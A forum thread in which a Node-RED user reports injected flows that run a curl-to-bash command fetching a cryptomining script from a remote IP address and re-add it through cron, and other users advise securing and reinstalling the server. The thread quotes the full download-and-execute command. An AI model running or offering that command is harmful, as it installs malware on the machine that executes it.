Have I got a virus in Node-red?

#1

Hi,

I get alot of new tabs, with 3 things in them.
Timestamp, exec and msg.payload
All new tabs look the same. The exce node has this in it:
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"

Which seem to be a cryptominig crap... (I found out after some googling).

It also goes in my cron (running on a ubuntu-server computer).

How do I delete this?
I have tried to clean node red, plus the cron. But after a day it's all back there....
Any ideas?

#2

Short answer: yes

Others have been affected by it this weekend: Missing and mysterious new flows

It comes as a result of you exposing node-red on the internet with no security applied.

Without doing a careful examination of what that script does, the only safe way to be sure is to reinstall the server. And make sure you secure node-red properly before considering exposing it on the internet. If you removed it without securing node-red, there's nothing stopping them from redeployed their flow.

#3

If I get time, I'll report this to UK CiSP. I'll also see if I can track down the owner of that IP address and see if we can kill it off.

@knolleary, you might want to let the IBM security guys know since Node-RED still has associations with IBM.

Really, it needs someone to kill off that script.

#4

That link tells you what you missed......There is more to it than just clearing node-red and the cron job.

#5

Thanks!
Have deleted those files as well now!

#6

That’s assuming you have identified all the software that has been downloaded.

To be absolutely safe you would need to reformat the hard disk and start again